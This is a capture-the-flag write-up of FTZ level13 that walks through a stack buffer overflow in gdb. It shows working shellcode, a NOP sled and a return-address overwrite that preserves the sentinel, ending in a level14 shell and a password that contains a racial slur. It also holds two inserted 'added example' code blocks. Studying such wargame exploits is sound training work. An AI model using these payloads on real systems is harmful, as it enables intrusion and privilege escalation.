Jaeseo's Information Security Story
FTZ - level13 - WriteUp
level13:have no clue
We start by reading the HINT!
```
[level13@ftz level13]$ cat hint
```

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <signal.h>
#include <unistd.h>

int main(int argc, char *argv[])
{
    long i = 0x1234567;        /* sentinel value placed between buf and the saved frame */
    char buf[1024];
    setreuid(3094, 3094);      /* 3094 = level14 (0xc16 in the disassembly) */
    if (argc > 1)
        strcpy(buf, argv[1]);  /* unbounded copy into a 1024-byte buffer */
    if (i != 0x1234567) {      /* sentinel changed: treat as an overflow */
        printf(" Warnning: Buffer Overflow !!! \n");
        kill(0, 11);           /* SIGSEGV to the whole process group */
    }
    return 0;
}
```
Unlike level11 and level12, this time a condition has been added: if the variable i, which sits between the buffer and the saved frame, is modified, a warning is printed and the program is forcibly terminated.
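The sentinel check in the hint program only notices a copy after it has already run past buf, and only if the value stored in i actually changed; the change that removes the bug is to bound the copy itself. The following is an added example, not part of this write-up or of the FTZ hint program: copy_arg is an assumed helper name that refuses any argument that does not fit in buf, shown next to the original sentinel test for comparison.

```c
/* Added example, not code from the original write-up or the FTZ hint program.
 * It shows the one change that actually removes the bug in the hint code:
 * bounding the copy instead of checking a sentinel value afterwards. */
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 1024

/* Bounded replacement for the hint program's strcpy(buf, argv[1]).
 * Returns 0 when src fits (terminator included) and -1 when it does not;
 * on -1 nothing is written, so the caller can reject the input instead of
 * letting it run past buf into the saved frame. */
int copy_arg(char *buf, size_t buflen, const char *src)
{
    size_t n = 0;
    while (n < buflen && src[n] != '\0')   /* never scans past buflen bytes */
        n++;
    if (n >= buflen)
        return -1;                          /* no room for the NUL terminator */
    memcpy(buf, src, n + 1);
    return 0;
}

/* The sentinel check from the hint program, kept for comparison: it only
 * reports an overflow if the value in that slot was actually changed. */
int sentinel_intact(long i)
{
    return i == 0x1234567;
}

/* Helper that feeds copy_arg a constructed argument of len 'A' bytes and
 * returns its result; -2 means the requested length exceeds the test buffer. */
int copy_arg_with_len(size_t len)
{
    char src[4096];
    char buf[BUF_SIZE];
    if (len >= sizeof src)
        return -2;
    memset(src, 'A', len);
    src[len] = '\0';
    return copy_arg(buf, sizeof buf, src);
}

int main(int argc, char *argv[])
{
    long i = 0x1234567;
    char buf[BUF_SIZE];

    if (argc > 1 && copy_arg(buf, sizeof buf, argv[1]) != 0) {
        fprintf(stderr, "argument too long (max %d bytes)\n", BUF_SIZE - 1);
        return 1;
    }
    if (!sentinel_intact(i)) {
        puts(" Warnning: Buffer Overflow !!! ");
        return 1;
    }
    return 0;
}
```

With the bounded copy in place, an argument of 1036 bytes (the length the write-up uses to reach i) is rejected before anything is written, so the sentinel never has to catch it.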
Now we build a copy of the program in the tmp folder and debug it with gdb.
```
(gdb) set disassembly-flavor intel
(gdb) disassemble main
Dump of assembler code for function main:
0x080483c8 <main+0>: push ebp
0x080483c9 <main+1>: mov ebp,esp
0x080483cb <main+3>: sub esp,0x418 // reserve 1048 bytes of stack
0x080483d1 <main+9>: and esp,0xfffffff0
0x080483d4 <main+12>: mov eax,0x0
0x080483d9 <main+17>: sub esp,eax
0x080483db <main+19>: mov DWORD PTR [ebp-12],0x1234567 // store 0x1234567 at ebp-12
0x080483e2 <main+26>: sub esp,0x8 // reserve 8 more bytes of stack, 1056 bytes in total
0x080483e5 <main+29>: push 0xc16
0x080483ea <main+34>: push 0xc16
0x080483ef <main+39>: call 0x80482e8 <setreuid>
0x080483f4 <main+44>: add esp,0x10
0x080483f7 <main+47>: cmp DWORD PTR [ebp+8],0x1
0x080483fb <main+51>: jle 0x8048417 <main+79>
0x080483fd <main+53>: sub esp,0x8
0x08048400 <main+56>: mov eax,DWORD PTR [ebp+12]
0x08048403 <main+59>: add eax,0x4
0x08048406 <main+62>: push DWORD PTR [eax]
0x08048408 <main+64>: lea eax,[ebp-1048]
0x0804840e <main+70>: push eax
0x0804840f <main+71>: call 0x8048308 <strcpy>
0x08048414 <main+76>: add esp,0x10
0x08048417 <main+79>: cmp DWORD PTR [ebp-12],0x1234567
0x0804841e <main+86>: je 0x804843f <main+119>
0x08048420 <main+88>: sub esp,0xc
0x08048423 <main+91>: push 0x8048520
0x08048428 <main+96>: call 0x80482d8 <printf>
0x0804842d <main+101>: add esp,0x10
0x08048430 <main+104>: sub esp,0x8
0x08048433 <main+107>: push 0xb
0x08048435 <main+109>: push 0x0
0x08048437 <main+111>: call 0x80482f8 <kill>
0x0804843c <main+116>: add esp,0x10
0x0804843f <main+119>: leave
0x08048440 <main+120>: ret
End of assembler dump.
```
From this we predict the stack layout: buf starts at ebp-1048 and i sits at ebp-12, so 12 bytes of padding separate the end of buf from i and 8 more separate i from the saved frame pointer.

| Stack layout |
|---|
| Data (buf) - 1024 bytes |
| Dummy data - 12 bytes |
| DWORD (0x1234567) - 4 bytes |
| Dummy data - 8 bytes |
| SFP (Stack Frame Pointer) - 4 bytes |
| RET (Return Address) - 4 bytes |
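As an added example, not code from the write-up, the following C program rebuilds the table above from the two frame offsets read in the disassembly, [ebp-1048] for buf and [ebp-12] for i, filling in the padding gaps and appending SFP and RET. build_layout, Var, Row and the other names are this example's own; the routine is general and applies to any frame once the ebp-relative offsets and sizes of its variables are known.

```c
/* Added example, not code from the original write-up: rebuilds the stack
 * layout table from the variable offsets read out of the disassembly
 * (lea eax,[ebp-1048] for buf, [ebp-12] for i), filling in the compiler
 * padding ("Dummy") and the saved frame pointer and return address. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define MAX_ROWS 32

typedef struct {
    const char *name;
    int ebp_off;   /* bytes below ebp: [ebp-1048] -> 1048 */
    int size;      /* bytes */
} Var;

typedef struct {
    char name[32];
    int size;
    int start;     /* byte distance from the start of the lowest variable */
} Row;

/* Sort so the variable farthest below ebp (lowest address) comes first. */
static int by_depth_desc(const void *a, const void *b)
{
    return ((const Var *)b)->ebp_off - ((const Var *)a)->ebp_off;
}

static int push_row(Row *rows, int *n, int maxrows, const char *name, int size, int start)
{
    if (*n >= maxrows) return -1;
    snprintf(rows[*n].name, sizeof rows[*n].name, "%s", name);
    rows[*n].size = size;
    rows[*n].start = start;
    (*n)++;
    return 0;
}

/* Fills rows[] from the lowest address up to RET. Returns the row count,
 * or -1 when variables overlap, run past ebp, or exceed maxrows. */
int build_layout(const Var *vars, int nvars, Row *rows, int maxrows)
{
    Var sorted[MAX_ROWS];
    int n = 0, base, cursor;

    if (nvars <= 0 || nvars > MAX_ROWS) return -1;
    memcpy(sorted, vars, (size_t)nvars * sizeof *vars);
    qsort(sorted, (size_t)nvars, sizeof *sorted, by_depth_desc);

    base = cursor = sorted[0].ebp_off;          /* deepest point of the frame */
    for (int k = 0; k < nvars; k++) {
        int gap = cursor - sorted[k].ebp_off;   /* unnamed bytes before this var */
        if (gap < 0) return -1;                 /* variables overlap: bad input */
        if (gap > 0) {
            if (push_row(rows, &n, maxrows, "Dummy", gap, base - cursor)) return -1;
            cursor -= gap;
        }
        if (push_row(rows, &n, maxrows, sorted[k].name, sorted[k].size, base - cursor)) return -1;
        cursor -= sorted[k].size;
    }
    if (cursor < 0) return -1;                  /* a variable runs past ebp */
    if (cursor > 0) {                           /* padding between last var and SFP */
        if (push_row(rows, &n, maxrows, "Dummy", cursor, base - cursor)) return -1;
        cursor = 0;
    }
    if (push_row(rows, &n, maxrows, "SFP", 4, base)) return -1;
    if (push_row(rows, &n, maxrows, "RET", 4, base + 4)) return -1;
    return n;
}

/* Distance from the start of the lowest variable to the named row, or -1. */
int offset_of(const Row *rows, int n, const char *name)
{
    for (int k = 0; k < n; k++)
        if (strcmp(rows[k].name, name) == 0) return rows[k].start;
    return -1;
}

/* The level13 frame as read from the disassembly above. */
static const Var level13_vars[] = {
    { "buf", 1048, 1024 },
    { "i",   12,   4    },
};

int level13_layout(Row *rows, int maxrows)
{
    return build_layout(level13_vars, 2, rows, maxrows);
}

/* Convenience wrappers so single values of the level13 frame can be queried. */
int level13_offset(const char *name)
{
    Row rows[MAX_ROWS];
    int n = level13_layout(rows, MAX_ROWS);
    return n < 0 ? -1 : offset_of(rows, n, name);
}

int level13_row_size(int k)
{
    Row rows[MAX_ROWS];
    int n = level13_layout(rows, MAX_ROWS);
    return (n < 0 || k < 0 || k >= n) ? -1 : rows[k].size;
}

int main(void)
{
    Row rows[MAX_ROWS];
    int n = level13_layout(rows, MAX_ROWS);
    if (n < 0) { fputs("bad frame description\n", stderr); return 1; }
    printf("%-8s %6s %6s\n", "field", "size", "start");
    for (int k = 0; k < n; k++)
        printf("%-8s %6d %6d\n", rows[k].name, rows[k].size, rows[k].start);
    return 0;
}
```

Running it prints six rows in the same order as the table: buf at 0, a 12-byte Dummy at 1024, i at 1036, an 8-byte Dummy at 1040, SFP at 1048 and RET at 1052, which is what the gdb dump in the next step is meant to confirm.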
Now we check in gdb whether this stack layout is right.
```
(gdb) r `python -c 'print "A"*1036'`
(gdb) x/100x $esp+1000
0xbfffbc68: 0x41414141 0x41414141 0x41414141 0x41414141
0xbfffbc78: 0x41414141 0x41414141 0x41414141 0x41414141
0xbfffbc88: 0xbf004141 0x01234567 0x42130a14 0x40015360
0xbfffbc98: 0xbfffbcb8 0x42015574 0x00000002 0xbfffbce4
0xbfffbca8: 0xbfffbcf0 0x4001582c 0x00000002 0x08048318
0xbfffbcb8: 0x00000000 0x08048339 0x080483c8 0x00000002
0xbfffbcc8: 0xbfffbce4 0x08048444 0x08048474 0x4000c660
0xbfffbcd8: 0xbfffbcdc 0x00000000 0x00000002 0xbfffd0e4
0xbfffbce8: 0xbfffd0ff 0x00000000 0xbfffd50a 0xbfffd528
0xbfffbcf8: 0xbfffd538 0xbfffd543 0xbfffd551 0xbfffd571
0xbfffbd08: 0xbfffd584 0xbfffd591 0xbfffd754 0xbfffd797
0xbfffbd18: 0xbfffd7b4 0xbfffd7c6 0xbfffd7db 0xbfffd7ec
0xbfffbd28: 0xbfffd7fd 0xbfffd810 0xbfffd818 0xbfffd837
0xbfffbd38: 0xbfffd847 0xbfffff78 0xbfffffaa 0xbfffffcc
0xbfffbd48: 0x00000000 0x00000020 0xffffe000 0x00000010
0xbfffbd58: 0x0f8bfbff 0x00000006 0x00001000 0x00000011
0xbfffbd68: 0x00000064 0x00000003 0x08048034 0x00000004
0xbfffbd78: 0x00000020 0x00000005 0x00000006 0x00000007
0xbfffbd88: 0x40000000 0x00000008 0x00000000 0x00000009
0xbfffbd98: 0x08048318 0x0000000b 0x00000c15 0x0000000c
0xbfffbda8: 0x00000c15 0x0000000d 0x00000c15 0x0000000e
0xbfffbdb8: 0x00000c15 0x0000000f 0xbfffd0df 0x00000000
0xbfffbdc8: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffbdd8: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffbde8: 0x00000000 0x00000000 0x00000000 0x00000000
```
Indeed, when exactly 1036 bytes of A are written, the very next word in memory is the sentinel value 0x1234567, which confirms the predicted layout.
Now we carry out the attack based on this.
```
[level13@ftz level13]$ export ATTACK=`python -c 'print "\x90"*10000+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"'`
```
Then we obtain the address of the environment variable with a small program that looks it up.
```
[level13@ftz level13]$ /tmp/get.out ATTACK
0xbfffd84d
[level13@ftz level13]$ ./attackme `python -c 'print "\x90"*1036+"\x67\x45\x23\x01"+"\x90"*12+"\x4d\xd8\xff\xbf"'`
sh-2.05b$ whoami
level14
sh-2.05b$ my-pass
TERM environment variable not set.
Level14 Password is "what that nigga want?".
```
level14:what that nigga want?